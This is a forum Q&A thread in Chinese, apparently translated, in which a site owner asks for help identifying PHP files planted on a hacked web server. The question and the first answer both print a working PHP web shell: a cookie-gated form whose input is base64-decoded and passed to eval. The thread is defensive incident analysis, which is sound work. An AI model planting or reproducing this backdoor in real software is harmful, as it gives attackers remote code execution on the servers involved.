找到PHP破解文件 - 帮助解码和识别

Question

我在我们的Web服务器上发现了一些破解文件。我设法去混淆他们一点 - 他们似乎都具有解码成块，看起来像一个部分：

if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) {echo '<textarea rows=28 cols=80>'; $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) @eval($d); echo '</textarea>';}echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';exit;} 

但这块（上述解码）通常被嵌入到一个更大的代码段。我已经在这里共享了其中一个文件的代码：http://pastie.org/3753704

我可以看看代码在哪里，但绝对不是PHP的专家，可以使用一些帮助来更具体地计算出它是什么做或启用。此外，如果任何人碰巧熟悉这种黑客攻击，任何有关它如何工作的信息以及黑客可能隐藏的后门和其他组件的位置都将非常有用，并且非常感谢。

我试图代码的谷歌的部分，看看其他人报告，但只有想出了这个链接：http://www.daniweb.com/web-development/php/threads/365059/hacked-joomla

谢谢！

Answer 1

如果cookie“v”设置为“d”，则在窗体中显示textarea。提交表单时，请在textarea中执行代码。

<?php 
if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){ 
    if (!empty($_POST['c'])) { 
     echo '<textarea rows=28 cols=80>'; 
     $d=base64_decode(str_replace(' ','+',$_POST['c'])); 
     if($d) 
      @eval($d); 
     echo '</textarea>'; 
    } 
    echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>'; 
    exit; 
} 
?> 

Answer 2

不是这个具体的破解，但this post中的一些建议可能会有所帮助。具体来说，访问日志可能会显示问题来自哪里。